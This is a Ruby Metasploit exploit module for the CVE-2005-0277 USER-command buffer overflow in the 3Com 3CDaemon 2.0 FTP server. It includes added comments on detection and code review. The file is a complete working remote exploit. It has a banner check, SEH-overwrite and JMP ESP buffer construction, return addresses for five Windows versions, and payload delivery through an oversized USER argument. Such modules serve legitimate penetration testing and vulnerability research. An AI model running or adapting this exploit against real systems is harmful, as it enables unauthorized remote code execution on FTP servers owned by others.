##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the 3Com 3CDaemon 2.0 FTP server username overflow
# (CVE-2005-0277, BID 12155). The overflow is reached through the argument of
# the FTP USER command. Four of the five targets overwrite an SEH record; the
# fifth (Windows XP SP3) returns straight into the payload via a JMP ESP.
#
# Defender's view: the probe in #check is an ordinary banner grab, and the
# trigger in #exploit is a single USER command whose argument is several
# hundred to 2048 bytes of random printable text -- far longer than any
# legitimate username, which makes it a simple thing to alert on.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability ranking as declared by the module author.
  Rank = AverageRanking

  # FTP client mixin (connect / disconnect / banner / send_cmd are used below)
  # and the SEH helper mixin (generate_seh_payload). Neither is in view here.
  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata: references, payload constraints and the
  # per-target return-address / offset pairs consumed by #exploit.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the 3Com 3CDaemon
          FTP service. This package is being distributed from the 3Com
          web site and is recommended in numerous support documents.
          This module uses the USER command to trigger the overflow.
        },
        'Author' => [
          'hdm', # Original author
          'otr' # Windows XP SP3
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0277'],
          [ 'OSVDB', '12810'],
          [ 'OSVDB', '12811'],
          [ 'BID', '12155']
        ],
        # EXITFUNC 'seh' matches the SEH-based targets; target 0 is the
        # Windows 2000 English entry below.
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
          'target' => 0
        },
        'Privileged' => false,
        'Payload' => {
          # Bytes available to the encoded payload.
          'Space' => 674,
          # Bytes the encoder must avoid: NUL, tab/LF/CR/space and the
          # punctuation ~ + & = % : " / \ . -- presumably characters the FTP
          # command parser treats specially (not verified here).
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
          # Framework payload option kept from the original; its effect is
          # applied by the framework, not by this module.
          'StackAdjustment' => -3500,
          # '-find' presumably excludes find-socket style payloads -- confirm
          # against the framework's Compat handling.
          'Compat' =>
          {
            'ConnectionType' => "-find"
          }
        },
        'Platform' => %w{win},
        # For targets 0-3 'Offset' is where the SEH record is written into a
        # 2048-byte buffer; for target 4 it is the amount of filler placed
        # before the return address (see #exploit).
        'Targets' => [
          [
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
            {
              'Platform' => 'win',
              'Ret' => 0x75022ac4, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows XP English SP0/SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x71aa32ad, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows NT 4.0 SP4/SP5/SP6',
            {
              'Platform' => 'win',
              'Ret' => 0x77681799, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows 2000 Pro SP4 French',
            {
              'Platform' => 'win',
              'Ret' => 0x775F29D0,
              'Offset' => 229,
            },
          ],
          # Index 4 is special-cased in #exploit (direct return, no SEH).
          [
            'Windows XP English SP3',
            {
              'Platform' => 'win',
              'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
              # 'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
              'Offset' => 245,
            },
          ],
        ],
        'DisclosureDate' => '2005-01-04',
        # The author left reliability, stability and side effects undeclared.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-based version check.
  #
  # Connects, disconnects, and then matches the stored greeting. The banner
  # is assumed to be captured by the FTP mixin during +connect+ -- the mixin
  # is not in view, so confirm before relying on it.
  #
  # @return [Exploit::CheckCode] Appears when the banner advertises
  #   "3Com 3CDaemon FTP Server Version 2.0", Safe otherwise. The regex only
  #   looks at the version string; it does not distinguish patched from
  #   unpatched builds of 2.0.
  def check
    connect
    disconnect
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the overflow as the USER argument, then hands control to the
  # payload handler.
  #
  # Two buffer layouts exist, chosen by target index:
  # * targets[4] (Windows XP SP3): 'Offset' bytes of filler, 'Ret' written
  #   twice as a little-endian 32-bit value, then the encoded payload.
  # * every other target: 2048 bytes of filler with the SEH record from
  #   generate_seh_payload spliced in at 'Offset'; the payload travels inside
  #   that record.
  #
  # NOTE(review): `target == targets[4]` ties the non-SEH branch to list
  # position. Inserting or reordering an entry in 'Targets' silently changes
  # which target takes this path; a per-target key in the target hash would
  # be more robust than the index. Note also the mixed access styles
  # (`target['Ret']` vs `target.ret`) for the same value.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    if (target == targets[4])
      # Filler is drawn from bytes outside the payload's BadChars.
      buf = rand_text_english(target['Offset'], payload_badchars)
      buf << [ target['Ret'] ].pack('V') * 2
      buf << payload.encoded
    else
      buf = rand_text_english(2048, payload_badchars)
      seh = generate_seh_payload(target.ret)
      # Replaces the slice at 'Offset' in place; the buffer keeps its 2048
      # bytes as long as the SEH record fits within it.
      buf[target['Offset'], seh.length] = seh
    end

    # Second argument false: presumably tells the mixin not to wait for a
    # reply (the service is expected to crash into the payload) -- confirm
    # against send_cmd, which is not in view.
    send_cmd(['USER', buf], false)

    handler
    disconnect
  end
end